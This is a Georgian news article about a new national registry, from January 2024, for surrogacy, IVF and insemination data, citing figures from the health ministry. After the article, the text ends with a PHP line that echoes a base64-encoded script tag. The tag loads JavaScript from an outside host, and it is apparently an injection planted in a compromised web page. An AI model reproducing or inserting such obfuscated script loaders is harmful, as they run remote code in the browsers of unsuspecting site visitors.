celsiusi
ავერსი საქკაბელი

 2024 წლის იანვრიდან, სუროგაციასთან, ინვიტრო განაყოფიერებასა და ინსემინაციასთან დაკავშირებული მონაცემები ერთიან რეესტრში აისახება. ინფორმაციას დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის სამინისტრო ავრცელებს.

ჯანდაცვის სამინისტროს ინფორმაციით, სამედიცინო დაწესებულება, სადაც აღნიშნული პროცედურები ტარდება, ვალდებული ხდება, გამოყენებული ქსოვილების, უჯრედების, ემბრიონების, ასევე კონტაქტში მყოფი მასალების თუ პირების შესახებ ინფორმაცია ერთიან ეროვნულ რეესტრში განათავსოს.

„ცვლილების მიზანი მომსახურების ხარისხის, პროცესის ზედამხედველობა, ასევე აღნიშნული მასალებისა და მათთან კავშირში მყოფი პირების მიკვლევადობაა. რეესტრში ყველა ინფორმაცია განთავსდება პირადი მონაცემების დაცვით და იქნება კონფიდენციალური.

აღსანიშნავია, რომ ცვლილებამდე, სერვისის მიმწოდებელ დაწესებულებებს მსგავსი ვალდებულება არ ჰგონიათ, შესაბამისად, შეუძლებელი იყო სამედიცინო მასალების მიკვლევადობა. ერთიანი რეესტრის საჭიროება კიდევ უფრო გამოიკვეთა ბოლო წლებში, როდესაც მთელს მსოფლიოში და მათ შორის – საქართველოში, რეპროდუქციის მიზნებისთვის მედიცინას სულ უფრო მეტი ადამიანი მიმართვას. თუ 2018 წელს, მხოლოდ სუროგაციით გზით დაბადებულ ახალშობილთა რიცხვი, დაახლოებით, 500 იყო, 2022 წელს მაჩვენებელი თითქმის გაორმაგდა და 1 000-ს გადააჭარბა.

აღსანიშნავია, რომ დღეის მდგომარეობით, დამხმარე რეპროდუქციული ტექნოლოგიებით სერვისს 19 დაწესებულება ახორციელებს.

ერთიანი ეროვნული რეესტრის ამოქმედება, პარლამენტში ინიცირებული, მედიცინის დახმარებით რეპროდუქციის შესახებ კანონპროექტის ერთ-ერთი წინაპირობაა, რაც, თავის მხრივ, ევროკავშირთან ასოცირების შეთანხმების მოთხოვნებთან არის შესაბამისობაში“, – აღნიშნულია დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის სამინისტროს ინფორმაციაში.

175
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");